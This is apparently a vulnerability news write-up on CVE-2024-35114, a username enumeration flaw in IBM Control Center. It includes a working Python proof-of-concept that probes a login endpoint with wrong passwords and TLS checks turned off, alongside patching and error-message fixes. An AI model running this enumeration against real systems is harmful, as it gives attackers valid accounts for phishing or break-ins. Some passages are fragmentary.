CVE CyberSecurity Database News

CVE-2024-35114 - IBM Control Center Username Enumeration Exploit – Full Breakdown

Poster -

A new security vulnerability has been catalogued as CVE-2024-35114, affecting IBM Control Center versions 6.2.1 and 6.3.1. This issue allows remote attackers to enumerate valid usernames by observing differences in server responses during login attempts. Even though it might sound simple, username enumeration is a classic first step in many cyber-attacks. This post explains the issue, shows how it works with example code, provides reference links, and walks through a practical exploit demonstration.

What Is CVE-2024-35114?

In summary, when a user submits a login request to IBM Control Center, the application responds differently depending on whether the username exists in the system. This makes it possible for an attacker to “guess” which usernames are valid, one by one, by watching for response changes.

IBM’s Official Advisory:
https://www.ibm.com/support/pages/node/715087

Target specific users for phishing or social engineering

This is a key step for attackers to gain access or move on to more advanced techniques.

Let’s say the login form sends a POST request

POST /ibmc/console/api/auth/login HTTP/1.1
Content-Type: application/json

{
    "username": "jdoe",
    "password": "wrongpassword"
}

The Flaw

The error messages are different!
That’s all an attacker needs.

Proof of Concept (PoC) Enumeration Script

Below is a simple Python script using requests that tries a list of usernames and prints which ones exist on the server.

import requests
import json

# IBM Control Center login URL
url = "https://ibmcontrolcenter.example.com/ibmc/console/api/auth/login";

# List of usernames to test
usernames = ["admin", "jdoe", "testuser", "jsmith"]

headers = {"Content-Type": "application/json"}

for username in usernames:
    data = {
        "username": username,
        "password": "WrongPassword123"  # Intentionally wrong
    }
    response = requests.post(url, data=json.dumps(data), headers=headers, verify=False)
    if "Incorrect password" in response.text:
        print(f"[+] Username FOUND: {username}")
    elif "User does not exist" in response.text:
        print(f"[-] Username not found: {username}")
    else:
        print(f"[?] Unknown response for {username}: {response.text}")

> *Warning*: This is for educational use only! Don’t attack any system you don’t own or have permission to test.

Real Exploit Scenario

Suppose an attacker wants to get a list of real users before attempting further exploits. By simply running the script above with a large list of common names or emails, they can discover usernames without triggering typical security alarms.

Fixes & Mitigation

The recommended approach is to standardize error messages. Always return a generic message such as:

{"error":"Invalid username or password"}

And never indicate if the username or the password was wrong.

IBM’s patch for this flaw is available here:
https://www.ibm.com/support/pages/node/715087
Make sure to update to the latest fixed version.

References

- IBM Security Bulletin: IBM Control Center vulnerability CVE-2024-35114
- NIST NVD Entry for CVE-2024-35114
- OWASP: Authentication Error Messages

Conclusion

CVE-2024-35114 is a clear example of how little oversights can expose entire platforms to risk. Even if it doesn’t allow direct access, username enumeration is a dangerous first step for attackers. Check your IBM Control Center, apply patches, and remember: never let your applications show their cards at the login gate.

Timeline

Published on: 01/25/2025 14:15:29 UTC